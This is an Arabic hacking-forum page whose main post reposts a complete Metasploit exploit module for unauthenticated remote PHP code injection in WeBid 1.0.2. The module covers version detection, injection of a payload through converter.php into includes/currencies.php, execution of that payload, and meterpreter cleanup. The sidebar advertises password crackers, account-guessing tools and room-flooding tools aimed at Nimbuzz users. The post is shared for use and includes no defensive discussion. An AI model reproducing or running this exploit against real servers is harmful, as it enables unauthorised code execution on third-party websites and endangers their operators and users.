منتديات القناص ابوهاجوس لهكرالنيمبوز وبرامج الاختراق
مرحبا بكم في منتدىات القناص ابوهاجوس لهكر النيمبوز وبرامج الاختراق
aboohagos@nimbuzz.com

منتديات القناص ابوهاجوس لهكرالنيمبوز وبرامج الاختراق

(aboohagos@nimbuzz.com)على من سجل ولم يستطيع الدخول ان ينتظر لين اقوم بتنشيط حسابه(aboohagos@nimbuzz.com)
 
الرئيسيةاليوميةمكتبة الصورس .و .جبحـثالأعضاءالمجموعاتالتسجيلدخول
بحـث
 
 

نتائج البحث
 
Rechercher بحث متقدم
سحابة الكلمات الدلالية
source Facebook mini code
المواضيع الأخيرة
ديسمبر 2018
الأحدالإثنينالثلاثاءالأربعاءالخميسالجمعةالسبت
      1
2345678
9101112131415
16171819202122
23242526272829
3031     
اليوميةاليومية
كل ماتطلبوه موجود
كل جديد وحصريا موجود لدينا
اي استفسار ضيف اميلاتي
aboohagos@nimbuzz.com
aboohagos@nimbuzz.com
أفضل 10 أعضاء في هذا المنتدى
Admin
 
ابوهاجوس
 
هكراووي
 
صدام الشرعبي
 
kimo.herolove
 
majed5160
 
jemlove
 
brainiac123
 
zezozezoalhlo
 
محمد العراقي 1005
 
أفضل 10 فاتحي مواضيع
Admin
 
ابوهاجوس
 
هكراووي
 
صدام الشرعبي
 
المتنبي
 
ghazi
 
عآزف$اوتار$الحزن
 
حسينم
 
وليدالعراقي
 
alzeer-libya
 
ازرار التصفُّح
 البوابة
 الرئيسية
 قائمة الاعضاء
 البيانات الشخصية
 س .و .ج
 بحـث
المواضيع الأكثر نشاطاً
الاصدار الرابع من برنامج التخمين بتاريخ11-5-2013
مشروع مخمن الباس بلغة Visual Basic 2010
Source Code Flood Room_aboohagos@nimbuzz.com.rar تم التعديل على مشروع فلود روم يقوم بفصل المستخدمين لغة (Visual Basic 2008)
تم تحديث صانع النكات واضافة قسم لتغير كلمة المرور بتاريخ31-5-2013
مشروع صانع نكات الفلود Source Code-ID Maker -
مشروع بان بوت مع الرسايل التلقايى+التحدث مع مضافينك لغة Visual Basic 2010
مشروع تخمين النكات شغال Source Code Cracker_ abohagooss@nimbuzz.com
Source Code Bot contest for Roman-aboohagos@nimbuzz.com مشروع بوت ابوهاجوس المتكامل
استرجاع النكات المسروقة+والمحروقه بتاريخ5-6-2013
اخطر برنامج فلود في تاريخ النيمبوز فلود روم+خاص+اضافات بتاريخ26-4-2013

شاطر | 
 

  ثغره جديده { WeBid converter.php Remote PHP Code Injection }

اذهب الى الأسفل 
كاتب الموضوعرسالة
Admin
Admin
avatar

عدد المساهمات : 2035
نقاط : 5633
السٌّمعَة : 11
تاريخ التسجيل : 16/05/2012
العمر : 32

مُساهمةموضوع: ثغره جديده { WeBid converter.php Remote PHP Code Injection }    الأربعاء يونيو 27, 2012 6:46 pm



بسم الله الرحمن الرحيم



كود PHP:
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'WeBid converter.php Remote PHP Code Injection',
'Description' => %q{
This module exploits a vulnerability found in WeBid version 1.0.2.
By abusing the converter.php file, a malicious user can inject PHP code
in the includes/currencies.php script without any authentication, which
results in arbitrary code execution.
},
'Author' => [
'EgiX', # Vulnerability Discovery, PoC
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '73609' ],
[ 'EDB', '17487' ]
],
'Version' => '$Revision: $',
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Payload' =>
{
},
'DisclosureDate' => 'Jul 05 2011',
'Targets' =>
[
[ 'WeBid 1.0.2 / Ubuntu', {} ]
],
'DefaultTarget' => 0
))

register_options(
[
OptString.new('TARGETURI', [true, 'The base path to WeBid', '/WeBid'])
], self.class
)

end

def check
uri = target_uri.path
uri << '/' if uri[-1,1] != '/'

res = send_request_cgi({
'method' => 'GET',
'uri' => uri + "docs/changes.txt"
})

if res and res.code == 200 and res.body =~ /1\.0\.2 \- 17\/01\/11/
return Exploit::CheckCode::Appears
end

res = send_request_cgi({
'method' => 'GET',
'uri' => uri + "converter.php"
})

if res and res.code == 200 and res.body =~ /WeBId.*CURRENCY CONVERTER/
return Exploit::CheckCode::Detected
end

return Exploit::CheckCode::Safe

end

def on_new_session(client)

if client.type != "meterpreter"
print_error("NOTE: you must use a meterpreter payload in order to automatically cleanup.")
print_error("The currencies.php won't be restored automatically.")
return
end

# stdapi must be loaded before we can use fs.file
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")

# Original currencies.php file
currencies_php = <<-eof
<?php
$conversionarray[] = '1265375103';
$conversionarray[] = array(
array('from' => 'GBP', 'to' => 'AED', 'rate' => '')
);
?>
eof
currencies_php = currencies_php.gsub(/^\t\t\t/, '')

pwd = client.fs.dir.pwd
print_status("Searching currencies.php file from #{pwd}")

res = client.fs.file.search(nil, "currencies.php", true, -1)
res.each do |hit|
filename = "#{hit['path']}/#{hit['name']}"
print_status("Restoring #{filename}")
client.fs.file.rm(filename)
fd = client.fs.file.new(filename, "wb")
fd.write(currencies_php)
fd.close
end

print_status("Cleanup finished")

end

def exploit

uri = target_uri.path
uri << '/' if uri[-1,1] != '/'
peer = "#{rhost}:#{rport}"

stub = "\0'));#{payload.encoded}?>"

print_status("#{peer} - Injecting the PHP payload")

response = send_request_cgi({
'uri' => uri + "converter.php",
'method' => "POST",
'vars_post' => {
"action" => "convert",
"from" => "USD",
"to" => stub
}
})

if response and response.code != 200
print_error("Server returned non-200 status code (#{response.code})")
return
end

print_status("#{peer} - Executing the PHP payload")

timeout = 0.01
response = send_request_cgi({
'uri' => uri + "includes/currencies.php",
'method' => "GET",
'headers' => {
'Connection' => "close",
}
}, timeout)

if response and response.code != 200
print_error("Server returned non-200 status code (#{response.code})")
end

handler
end
end

رابط الثغره : [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]


تحياتي
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو http://alqhas.montadarabi.com
 
ثغره جديده { WeBid converter.php Remote PHP Code Injection }
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» برنامج محول الفيديو الاول
» برنامج Color7.Video.Converter.Premier.v8.0.5.20+ key
» تحميل برنامج ImTOO iPod Movie Converter 5.1.22.0310
» اشارات مورس Morse code

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتديات القناص ابوهاجوس لهكرالنيمبوز وبرامج الاختراق :: منتدى الاختراق العام :: قسم الاختراق العام :: لقسم يعالج الثغرات بجميع أنواعها ويحوي شروحات عن كيفية أكتشاف الثغرات وأستغلالها-
انتقل الى: